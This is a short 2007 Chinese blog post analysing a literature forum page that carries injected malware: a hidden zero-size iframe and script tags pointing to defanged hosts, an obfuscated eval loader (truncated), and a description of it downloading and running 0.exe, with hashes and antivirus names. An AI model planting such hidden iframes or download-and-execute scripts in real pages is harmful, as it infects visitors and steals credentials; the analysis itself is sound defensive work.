文学论坛挂的马变为 Worm.Win32.QQPass.a / 0.exe
endurer 原创
2007-08-31 第1版
检查发现网页中包含代码:
/---
<iframe src="hxxp://www.y*oyo*5*9***.com/m**6*8.htm?id=907" width="0" height="0" frameborder="0"></iframe>
---/
hxxp://www.y*oyo*5*9***.com/m**6*8.htm?id=907 包含代码:
/---
<script src=hxxp://www.y*oyo*5*9***.com/00.js></script>
1
2
3
<script src=hxxp://www.y*oyo*5*9***.com/11.js></script>
---/
00.js 内容为:
/---
eval("/146/165…(略)…/40/175")
---/
解密后的代码功能为 下载 hxxp://www.*down*8**9.com/0.exe,保存到 %windir%,文件名由自定义函数:
/---
function gn(tnV1) { var kUzRo2 = window["Math"]["random"]()*tnV1; return '.tmp'+'~tmp'; }
---/
生成,即~tmp.tmp,然后用 cmd.exe /c 来运行。
文件说明符 : d:/test/0.exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2007-8-31 19:3:13
修改时间 : 2007-8-31 19:3:22
访问时间 : 2007-8-31 0:0:0
大小 : 16944 字节 16.560 KB
MD5 : ceb6f4d04c9f5ff2f6636dd7233460d9
HSA1: 9F48898ECA47463712D65752C4AF0C072F200C8F
Kaspersky 报为 Worm.Win32.QQPass.a,瑞星 报为 Trojan.PSW.Win32.Agent.vcd
11.js 没有什么可疑的东东。
标签:---,www,exe,hxxp,31,Worm,js,Win32,com From: https://blog.51cto.com/endurer/5881507